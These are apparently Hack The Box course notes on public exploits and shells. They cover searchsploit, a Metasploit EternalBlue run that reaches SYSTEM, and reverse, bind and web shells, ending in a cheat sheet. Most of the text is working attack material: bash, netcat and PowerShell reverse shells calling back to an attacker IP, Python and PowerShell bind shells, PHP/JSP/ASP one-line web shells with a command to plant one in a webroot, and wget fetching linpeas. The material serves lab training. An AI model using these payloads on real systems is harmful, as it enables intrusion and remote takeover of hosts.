recon exploits
Public Exploits
Once we identify the services running on ports identified from our Nmap scan, the first step is to look if any of the applications/services have any public exploits. Public exploits can be found for web applications and other applications running on open ports, like SSH or ftp.
Finding Public Exploits
Many tools can help us search for public exploits for the various applications and services we may encounter during the enumeration phase. One way is to Google for the application name with exploit to see if we get any results:
web search
A well-known tool for this purpose is searchsploit, which we can use to search for public vulnerabilities/exploits for any application. We can install it with the following command:
Public Exploits
vosill@htb[/htb]$ sudo apt install exploitdb -y
Then, we can use searchsploit to search for a specific application by its name, as follows:
Public Exploits
vosill@htb[/htb]$ searchsploit openssh 7.2
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
OpenSSH 7.2 - Denial of Service | linux/dos/40888.py
OpenSSH 7.2p1 - (Authenticated) xauth Command Injection | multiple/remote/39569.py
OpenSSH 7.2p2 - Username Enumeration | linux/remote/40136.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
OpenSSHd 7.2p2 - Username Enumeration | linux/remote/40113.txt
----------------------------------------------------------------------------------------------------------------------------- ---------------------------------
We can also utilize online exploit databases to search for vulnerabilities, like Exploit DB, Rapid7 DB, or Vulnerability Lab. The Intro to Web Applications module discusses public vulnerabilities for web applications.
Metasploit Primer
The Metasploit Framework (MSF) is an excellent tool for pentesters. It contains many built-in exploits for many public vulnerabilities and provides an easy way to use these exploits against vulnerable targets. MSF has many other features, like:
- Running reconnaissance scripts to enumerate remote hosts and compromised targets
- Verification scripts to test the existence of a vulnerability without actually compromising the target
- Meterpreter, which is a great tool to connect to shells and run commands on the compromised targets
- Many post-exploitation and pivoting tools
Let us take a basic example of searching for an exploit for an application we are attacking and how to exploit it. To run Metasploit, we can use the msfconsole command:
Public Exploits
vosill@htb[/htb]$ msfconsole
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v6.0.16-dev ]
+ -- --=[ 2074 exploits - 1124 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Once we have Metasploit running, we can search for our target application with the search exploit command. For example, we can search for the SMB vulnerability we identified previously:
Public Exploits
msf6 > search exploit eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
<SNIP>
EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010
Tip: Search can apply complex filters such as search cve:2009 type:exploit. See all the filters with help search
We found one exploit for this service. We can use it by copying the full name of it and using USE to use it:
Public Exploits
msf6 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
Before we can run the exploit, we need to configure its options. To view the options available to configure, we can use the show options command:
Public Exploits
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
...SNIP...
Any option with Required set to yes needs to be set for the exploit to work. In this case, we only have two options to set: RHOSTS, which means the IP of our target (this can be one IP, multiple IPs, or a file containing a list of IPs). The second option, LHOST, represents the IP of our attack host (this can be a single IP, or the name of a network interface. In the example below, LHOST is being set to the IP associated with our tun0 interface.) We can set them with the set command:
Public Exploits
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0
LHOST => tun0
Once we have both options set, we can start the exploitation. However, before we run the script, we can run a check to ensure the server is vulnerable:
Public Exploits
msf6 exploit(windows/smb/ms17_010_psexec) > check
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
As we can see, the server is indeed vulnerable. Note that not every exploit in the Metasploit Framework supports the check function. Finally, we can use the run or exploit command to run the exploit:
Public Exploits
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] 10.10.10.40:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[*] 10.10.10.40:445 - Built a write-what-where primitive...
[+] 10.10.10.40:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.40:445 - Selecting PowerShell target
[*] 10.10.10.40:445 - Executing the payload...
[+] 10.10.10.40:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.2:4444 -> 10.10.10.40:49159) at 2020-12-27 01:13:28 +0000
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 39640 created.
Channel 0 created.
Windows 7 Professional 7601 Service Pack 1
(C) Copyright 1985-2009 Microsoft Corp.
C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
As we can see, we have been able to gain admin access to the box and used the shell command to drop us into an interactive shell. These are basic examples of using Metasploit to exploit a vulnerability on a remote server. There are many retired boxes on the Hack The Box platform that are great for practicing Metasploit. Some of these include, but not limited to:
- Granny/Grandpa
- Jerry
- Blue
- Lame
- Optimum
- Legacy
- Devel
Later on, in this module, we will walk through the Nibbles box step-by-step and then show exploitation using Metasploit. Metasploit is another essential tool to add to our toolkit, but it is crucial not solely to rely on it. To be well-rounded testers, we must know how to best leverage all of the tools available to us, understand why they sometimes fail, and know when to pivot to manual techniques or other tools.
Types of Shells
Once we compromise a system and exploit a vulnerability to execute commands on the compromised hosts remotely, we usually need a method of communicating with the system so we don’t have to keep exploiting the same vulnerability to execute each command. To enumerate the system or take further control over it or within its network, we need a reliable connection that gives us direct access to the system’s shell (e.g., Bash or PowerShell) so we can thoroughly investigate the remote system for our next move.
One way to connect to a compromised system is through network protocols, like SSH for Linux or WinRM for Windows, which would allow a remote login to the compromised system. However, unless we obtain a working set of login credentials, we would not be able to utilize these methods without executing commands on the remote system first to gain access to these services in the first place.
The other method of accessing a compromised host for control and remote code execution is through shells.
As previously discussed, there are three main types of shells: Reverse Shell, Bind Shell, and Web Shell. Each of these shells has a different method of communication for accepting and executing our commands.
| Type of Shell | Method of Communication |
|---|---|
| Reverse Shell | Connects back to our system and gives us control through a reverse connection. |
| Bind Shell | Waits for us to connect to it and gives us control once we do. |
| Web Shell | Communicates through a web server, accepts our commands through HTTP parameters, executes them, and prints back the output. |
Reverse Shell
A Reverse Shell is the most common type of shell, as it is the quickest and easiest method to obtain control over a compromised host. Once we identify a vulnerability on the remote host that allows remote code execution, we can start a netcat listener on our machine that listens on a specific port, say port 1234. With this listener in place, we can execute a reverse shell command that connects the remote system’s shell (e.g., Bash or PowerShell) to our netcat listener, which gives us a reverse connection to the remote system.
Netcat Listener
Start a netcat listener on a port of your choosing:
vosill@htb[/htb]$ nc -lvnp 1234
listening on [any] 1234 ...Flags used
| Flag | Description |
|---|---|
| -l | Listen mode, to wait for a connection to connect to us. |
| -v | Verbose mode, so that we know when we receive a connection. |
| -n | Disable DNS resolution and only connect from/to IPs, to speed up the connection. |
| -p 1234 | Port number netcat is listening on, and the reverse connection should be sent to. |
Connect Back IP
Find our system’s IP to send a reverse connection back to us:
vosill@htb[/htb]$ ip a
...SNIP...
3: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 500
link/none
inet 10.10.10.10/23 scope global tun0
...SNIP...In this example, the IP of interest is under tun0, which is the HTB VPN network.
Note: We are connecting to the IP in
tun0because HTB boxes are accessed through the VPN and do not have internet connectivity. In a real pentest you may useeth0or another adapter depending on network topology.
Reverse Shell Commands
Commands depend on the target OS (Linux/Windows) and what utilities are available. The Payloads All The Things cheat sheet has a comprehensive list. Below are reliable examples:
Bash (Linux):
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/fPowerShell (Windows):
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"Once executed via an exploit (Python script, Metasploit module, etc.), you should receive a connection in your netcat listener:
vosill@htb[/htb]$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.10] from (UNKNOWN) [10.10.10.1] 41572
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)A Reverse Shell is handy for quick access but can be fragile: if the connection drops or the command stops, you’ll need to re-exploit to regain access.
Bind Shell
A Bind Shell makes the target host listen on a port and bind a shell to that port. After executing a bind shell command on the target, you connect to that listening port (e.g., with netcat) to get a shell.
Bind Shell Commands
Bash:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/fPython:
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();
while True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'PowerShell:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();Netcat Connection
After starting the bind shell, connect to it:
vosill@htb[/htb]$ nc 10.10.10.1 1234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)A bind shell can be more persistent for reconnecting (assuming the bind process is still running), but if the process stops or the host reboots, access is lost until re-exploited.
Upgrading TTY
Netcat shells are often limited: no cursor movement, no command history. Upgrade the shell to a proper TTY for a better interactive experience. One common method is the pty/stty technique.
In the netcat shell:
vosill@htb[/htb]$ python -c 'import pty; pty.spawn("/bin/bash")'Then background the shell (Ctrl+Z), run on your local terminal:
vosill@htb[/htb]$ stty raw -echo
vosill@htb[/htb]$ fg
[Enter]
www-data@remotehost$To fix terminal size and term type, in a separate local terminal window check:
vosill@htb[/htb]$ echo $TERM
xterm-256color
vosill@htb[/htb]$ stty size
67 318Then on the remote shell set:
export TERM=xterm-256color
stty rows 67 columns 318Now the shell behaves more like a normal SSH session.
Web Shell
A Web Shell is a script (PHP, ASPX, JSP, etc.) placed in a webroot that accepts commands via HTTP parameters (GET/POST), executes them, and returns output in the HTTP response.
Writing a Web Shell
Simple one-line web shells:
PHP:
<?php system($_REQUEST["cmd"]); ?>JSP:
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>ASP:
<% eval request("cmd") %>Uploading a Web Shell
Place the shell script into the webroot (e.g., via an upload vulnerability or by using an existing RCE to write the file). Common default webroot locations:
| Web Server | Default Webroot |
|---|---|
| Apache | /var/www/html/ |
| Nginx | /usr/local/nginx/html/ |
| IIS | C:\inetpub\wwwroot\ |
| XAMPP | C:\xampp\htdocs\ |
Example (write a PHP shell on a Linux Apache host):
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.phpAccessing the Web Shell
Visit the uploaded file in a browser:
http://SERVER_IP:PORT/shell.php?cmd=id
Or use curl:
vosill@htb[/htb]$ curl http://SERVER_IP:PORT/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Web shells often bypass firewall restrictions (since they use standard web ports 80/443) and persist through reboots, but they are less interactive compared to reverse/bind shells. Automation (scripts) can make them semi-interactive.
Cheat Sheet (Selected commands)
Basic tools
sudo openvpn user.ovpn— Connect to VPNifconfig/ip a— Show our IP addressnetstat -rn— Show networks accessible via the VPNssh user@10.10.10.10— SSH to a remote serverftp 10.129.42.253— FTP to a remote servertmux— Start tmuxvim file— Open file with vim:wq/:q!— Save & quit / quit without saving
Pentesting — Service scanning
nmap 10.129.42.253— Run nmap on an IPnmap -sV -sC -p- 10.129.42.253— Run an nmap script scan on an IPsmbclient -N -L \\10.129.42.253— List SMB shares
Web enumeration
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt— Directory scancurl -IL https://www.inlanefreight.com— Grab website bannercurl 10.10.10.121/robots.txt— List potential directories
Using shells
nc -lvnp 1234— Start a nc listener on a local portbash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'— Reverse shell (remote → us)rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f— Start a bind shellnc 10.10.10.1 1234— Connect to a bind shellpython -c 'import pty; pty.spawn("/bin/bash")'— Upgrade shell TTY
Privilege escalation tools
./linpeas.sh— Run linpeas to enumerate the remote serversudo -l— List available sudo privileges
Transferring files
python3 -m http.server 8000— Start a local webserverwget http://10.10.14.1:8000/linpeas.sh— Download a file on the remote server from our machinescp linenum.sh user@remotehost:/tmp/linenum.sh— Transfer a file (requires SSH)